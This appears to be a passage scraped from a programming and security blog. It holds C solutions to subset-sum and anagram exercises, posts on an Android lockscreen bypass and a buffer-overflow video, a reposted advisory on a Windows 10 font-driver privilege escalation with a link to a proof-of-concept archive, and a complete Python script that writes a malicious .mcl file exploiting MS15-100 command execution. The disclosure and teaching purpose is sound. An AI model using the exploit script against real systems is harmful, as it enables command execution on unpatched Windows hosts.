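  }
 }
 return 0;
}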

Q. No. 3

     Write a program to print all subsets of given set with sum equal to given value.

     Eg. Input:
          Set: 3 34 4 12 5 2
          Sum: 9
     Output:
          {4, 5}, {3, 4, 2}

Solution

#include <stdio.h>
/*

[*] Coded By Ajith Kp
[*] http://www.terminalcoders.blogspot.com

*/
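int main()
{
 /* Print every non-empty subset of the input set whose elements sum to x,
    one subset per line in the form "{ a b c }". Subsets are enumerated by
    walking an n-bit mask downwards: bit (n-1-k) of the mask selects arr[k].
    n is limited to 30 so the mask fits in an int; a bad or out-of-range
    input ends the program with status 1. */
 int n, arr[256], sarr[256], x, i, j, k, ind, sum;
 printf("Enter size: ");
 if(scanf("%d", &n) != 1 || n < 1 || n > 30)
 {
  printf("Size must be between 1 and 30\n");
  return 1;
 }
 printf("Enter %d items: ", n);
 for(i=0;i<n;i++)
 {
  if(scanf("%d", &arr[i]) != 1)
  {
   printf("Invalid item\n");
   return 1;
  }
 }
 printf("Enter sum: ");
 if(scanf("%d", &x) != 1)
 {
  printf("Invalid sum\n");
  return 1;
 }
 /* Start at (1<<n)-1, not 1<<n: that extra mask has only bit n set, which
    no element uses, so it stood for the empty subset and printed sarr[-1]
    whenever x == 0. */
 for(i=(1<<n)-1; i>0; i--)
 {
  sum = 0;
  ind = 0;
  for(j=n-1, k=0; j>=0; j--, k++)
  {
   if((1<<j) & i)
   {
    sum+=arr[k];
    sarr[ind] = arr[k];
    ind++;
   }
  }
  /* ind > 0 guards the sarr[ind-1] access below. */
  if(sum==x && ind>0)
  {
   printf("{ ");
   for(k=0;k<ind-1;k++)
   {
    printf("%d ", sarr[k]);
   }
   printf("%d }\n", sarr[ind-1]);
  }
 }
 printf("\n");
 return 0;
}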

Q. No. 4

     Write a program to implement a function that verifies whether two words are a pair of anagrams. (If two words have the same characters and the number of occurrences of each character is also identical, they are anagrams.)

     Eg. Input:
          silent listen
     Output:
          The given strings are Anagrams

Solution

#include <stdio.h>
#include <string.h>
/*

[*] Coded By Ajith Kp
[*] http://www.terminalcoders.blogspot.com

*/
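int main()
{
 /* Read two words and report whether they are anagrams (case-sensitive,
    byte-wise, like the strcmp-based original). Instead of sorting both
    words, each byte of str1 increments a counter and each byte of str2
    decrements it; the words are anagrams exactly when every counter is
    back at zero. Reads are bounded to 255 characters to fit the buffers;
    a failed read exits with status 1. */
 char str1[256], str2[256];
 int counts[256] = {0};
 size_t i, len1, len2;
 printf("1st word: ");
 if(scanf("%255s", str1) != 1)
 {
  return 1;
 }
 printf("2nd word: ");
 if(scanf("%255s", str2) != 1)
 {
  return 1;
 }
 len1 = strlen(str1);
 len2 = strlen(str2);
 if(len1 != len2)
 {
  printf("The given words are not Anagrams\n");
  return 0;
 }
 for(i=0;i<len1;i++)
 {
  /* Cast to unsigned char so bytes >= 0x80 index the table in range. */
  counts[(unsigned char)str1[i]]++;
  counts[(unsigned char)str2[i]]--;
 }
 for(i=0;i<256;i++)
 {
  if(counts[i] != 0)
  {
   printf("The given words are not Anagrams\n");
   return 0;
  }
 }
 printf("The given words are Anagrams\n");
 return 0;
}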


AJITH KP

Android 5.x Lockscreen Bypass Vulnerability

Hello GuyZ,
     Android 5.x has a lockscreen bypass vulnerability. Watch the video to understand how the lockscreen security is bypassed. Google has also released an update named 'LYM48M Android 5.1.1'.
Phone Hacking
Image from: wonderhowto.com


Video


AJITH KP

Simple Buffer Overflow Attack with Example: Video tutorial Part 2

I hope you have watched the previous tutorial. Else please watch from here: http://terminalcoders.blogspot.com/2015/08/simple-buffer-overflow-attack-with.html
This is the second part and explains many things about buffer overflow. This video also describes how to detect and exploit a buffer overflow in Windows using OllyDbg. The target program used for the exploit is Cool Player.
Buffer Overflow
Image from: wonderhowto.com
The video tutorial shows all steps of buffer overflow exploitation and also shows how to write buffer overflow exploits in Python. The exploit is a local exploit because it only runs when a local user plays the malicious MP3 file in Cool Player.

Video

Wednesday 16 September 2015

AJITH KP

Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation

     After the RCE vulnerability found in Windows 7, Windows 10 also has a serious vulnerability. The new vulnerability detected in Windows 10 is a 'permission privilege escalation'.


    POC

Source: https://code.google.com/p/google-security-research/issues/detail?id=468
 
Windows: User Mode Font Driver Thread Permissions EoP
Platform: Windows 10 Build 10130
Class: Elevation of Privilege
 
Summary:
The host process for the UMFD runs as a normal user but with a heavily restrictive process DACL. It’s possible to execute arbitrary code within the context of the process because it’s possible to access the process’s threads, leading to local EoP.
 
Description:
 
NOTE: This was tested on the latest available build on Windows 10. I don’t know if the final version will change the functionality to fix this vulnerability.
 
When a custom font is used in Windows 10 the User Mode Font Driver comes into play. This is initialized by a call from the kernel into the user sessions winlogon process which in turn spawns a new copy of fontdrvhost.exe. The process is started inside an appcontainer heavily restricting what resources it could access if a font bug was able to compromise it. However win32k exposes some additional calls to the UMFD for its own purposes, some of which are potentially dangerous. For that reason (presumably) winlogon creates the process with a specific DACL limiting access to the process and initial thread to SYSTEM only.
 
There’s a few problems with this approach, firstly it’s still running in the context of the user and includes the user’s environment variables such as PATH. This might mean if any badly written code later relies on the drive mapping or PATH there could be issues. More serious however is the specified DACL only applies to the process object and the initial thread object, but not to any subsequent thread. Therefore those threads get the default DACL from the process token (which is never changed) and are marked as owned by the current user, so the DACL could be rewritten anyway. This is a problem as with write access to the threads it’s possible to change their context and redirect execution to an arbitrary location. As the token is a lowbox token this can even be done in low integrity processes such as IE PM. 
 
The exploitation is made trickier by the fact that you can’t directly read or write the process’ memory. Still one thing you could do is redirect the thread to LoadLibraryW and pass it the known address of a string. This can either be a string in a loaded library and rely on the path environment variable to allow it to be resolved or in something like the GDI heap.
 
Once in the UMFD process you can then send some of the specific Win32k escape codes. For example there’s one currently called UmfdEscEngCreateFile which will open (for read or write) a couple of files in system32. The open is done in kernel mode, with no forced access check (even though an impersonation is performed) and the handle returned to user mode. This is dangerous for a number of reasons, specifically that the NTFS driver will mark the file as having create symbolic link permissions because it’s opened in kernel mode which means the caller could set a file symbolic link. Then it could reopen the file and it would be able create an arbitrary file on disk. This hasn’t been completely tested however but it’s an example of a dangerous call, of course it could just be a vestigial feature which will be removed in release builds as the code is pretty dangerous and doesn’t even work as expected. 
 
This issue could probably be fixed in a few ways, firstly the default token DACL should be set so that it maintains the security, assuming this is possible. Also you’d probably need to set OWNER_RIGHTS SID otherwise the user could just open the thread and rewrite its DACL. Also not using the actual user’s environment would probably be a good idea although not necessarily a complete fix. Finally presumably the process mitigation to only allow signed modules could be enabled which would complicate exploitation especially in the presence of CFG. 
 
Proof of Concept:
 
I’ve provided a PoC which just crashes the fontdrvhost process at a predictable address. It’s only built for the 32 bit version of Windows 10 but presumably it would work on the 64 bit version as well. The password for the archive is "password".
 
1) Copy the PoC to a directory
2) Execute the PoC, if it wasn’t already a new instance of fontdrvhost.exe should have started. You might want to attach a debugger at this point.
3) Click the Do Exploit button, if at this point the fontdrvhost process doesn’t crash open a new copy of the PoC just to kick the threads inside the process.  
 
Expected Result:
It’s not possible to influence the fontdrvhost process.
 
Observed Result:
Thread execution redirected to an arbitrary address of 0x55555555.
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38198.zip

Saturday 12 September 2015

Ajith KP

Windows Media Center - Command Execution (MS15-100) Vulnerability

Hello GuyZ,
     Windows 7 is affected by a command execution vulnerability: Windows Media Center is vulnerable to a command execution attack. The exploit was written by R-73eN.

Exploit Link: http://0day.today/exploit/description/24239

Before Running evil MCL file

After Running evil MCL file

Source Code


# Title: MS15-100 Windows Media Center Command Execution
# Date : 11/09/2015
# Author: R-73eN
# Software: Windows Media Center
# Tested : Windows 7 Ultimate
# CVE : 2015-2509
  
  
# ASCII-art banner printed before the file is generated (Python 2 print).
banner = ""
banner += " ___        __        ____                 _    _  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner

# The whole .mcl content is one <application run="..."/> element; per the
# post, Windows Media Center launches the named program when the file is
# opened (the PoC uses the benign calc.exe). The value is concatenated into
# the markup without any escaping, so it is only suitable for this fixed
# literal.
command = "calc.exe"
evil = '<application run="' + command + '"/>'
# Written as text to Music.mcl in the current working directory and closed
# explicitly (no `with` block).
f = open("Music.mcl","w")
f.write(evil)
f.close()
print "\n[+] Music.mcl generated . . . [+]"